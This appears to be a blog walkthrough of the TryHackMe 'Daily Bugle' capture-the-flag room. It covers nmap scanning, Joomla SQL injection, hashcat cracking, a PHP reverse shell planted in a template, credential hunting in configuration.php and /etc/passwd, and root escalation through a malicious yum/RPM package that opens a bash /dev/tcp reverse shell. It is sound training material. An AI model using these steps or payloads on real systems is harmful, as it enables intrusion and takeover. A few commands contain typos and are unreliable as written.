I enjoy doing CTFs and I think everyone should try them, they allow us to hone our skills while having a little fun at the same time. This walkthrough is for Try Hack Me The Daily Bugle which can be found here.
Early disclaimer all information that could lead to a quick win has been redacted, enjoy!
Enumeration
For CTFs my first goal stop will always be nmap, this is your best friend for starting out. nmap is a network scanner that will give us information on the ports that are available. I use this command:
nmap -sV ipaddr
Where the ipaddr is replaced with the target machines IP address. The return should look like this:
Here we have ports 22, 80 and 3306 open. Port 22 is for SSH which is a command line based remote connection tool. Port 80 is http, this means it is hosting a webserver. Finally 3306 is mysql which means there is a database being hosted. Our next step is to checkout the webpage and see what we can find out about this server.
You can use tools like dirb or gobuster to enumerate webpage directories with brute force but in this instance I tried to see if a administrator page existed and I was lucky enough to see that it did. This is something to make note of. It does not hurt to poke around the webpage for a little bit and see if anything is hidden but I didn’t find anything. Thankfully for us a tool called joomblah exist which is made to enumerate Joomla webpages!
Joomblah.py can be found here. What joomblah.py did was exploit a SQL injection and get a table. The table we received then had a user and their hash on it. Our next step is to try and crack this hash!
In order to do this we need to copy the hash to a txt file and use a tool called hashcat. I used the following command:
hashcat -m 3200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt
Remember, it is okay to not know every switch off of the top of your head. That would make you a walking CEH exam, when you need help almost every tool supports /h or — help or — h and that will return a list of switches for your command/tool. To break it down a little, the -m allows us to specify what type of hash we are cracking. The -a allows us to choose an attack mode, or in other words how many resources will be used on this tasks.
Rockyou.txt is by default zipped in Kali Linux so you might have to unzip it first. The hash can be cracked using rockyou.txt pretty fast. The password we just received and the information we already have allows us to login to the admin page.
Once in the admin page you can go to template and embed a php reverse shell into it, one can be found here. In the reverse shell you have to change your IP address and listening port. Once you do that you can start a reverse shell with netcat
nc -lvp port
Now that the listener is active we can call on the changed template and get a reverse shell! This is our foothold!
The shell we have is /var/www which is the service account for the web service. This does not mean it is useless but it does mean we will have limited access. After looking around the directory for a while I found an interesting file called configuration.php.
There are 2 passwords in it! This is great, but after trying to login via ssh the password is not for our user Jonah and it is not for root. This means there is might be another user it works for. We can find all users by looking at the /etc/passwd file. This can be done with the following command:
cat /etc/passwd
Here we find that jonah’s username is jjameson, here you can do one of two things. 1. you can login through ssh 2. you can use the su command to switch users to jjameson.
Now that we have a user shell you can get user.txt!
Privilege Escalation
Now that we have a user shell we need to get root privileges of this machine. I looked around for some sort of file that might give away the secret but I couldn’t find one. Next I use the command:
sudo -l
This command will list the sudo permissions of our user (if there is any).
It returns that we have sudo privileges to /usr/bin/yum. This is where everything gets a little tricky but I can get you through it. There is a website called GTFOBins (link) that allows you to search for any of these sudo privileges and use it to leverage a root shell. GTFO tells us that we can use a reverse shell rpm script to get the shell.
Kali does not (natively) support the ability to build a RPM package. You can use https://github.com/jordansissel/fpm to build it.
git clone https://github.com/jordansissel/fpm
cd fpm/
get install fpm
apt-get install rpm
Now we have the tool installed and setup. Next we need to create a payload. A simple bash script will suffice:
#!/bin/bash
bash -i >& /dev/tcp/ATTACKER IP/LISTENTING PORT 0>&1
we need to create a .sh file and put this in it. After that you have to build the RPM package.
fpm -n root -s dir -t rpm -a all — before-install /tmp/rpmdemo/root.sh /rmp/rpmdemo
fpm -h will again, give you a help menu to better help you use the tool to its fullest capacity. Once this is done, you need to host a local website so we can transfer the file to the target machine. The easiest way to do this would be to navigate to the rpm file and use python:
python -m SimpleHTTPServer 80
or
python -m http.server 80
You can also use apache if you want but I found this easier. Then use:
After this you can install the package and it will run the script giving us a reverse shell. (Don’t forget to start your listener on your host machine)
sudo yum localinstall -y filename.rpm
BOOM! Your listener should have picked it up and that means…
ROOT!
I wanted to put a note here at the bottom that you aren’t required to know everything, this is a learning experience or to test the metal of the more hardened hackers. I did not know how to create a rpm file and I had to look up a guide (linked bellow). The internet is your tool, use it! Use all the tools at your disposal to reach your goals!
Thanks for joining me on this journey I had a blast and I learned something new! I hope you share my sentiments, Happy hacking!
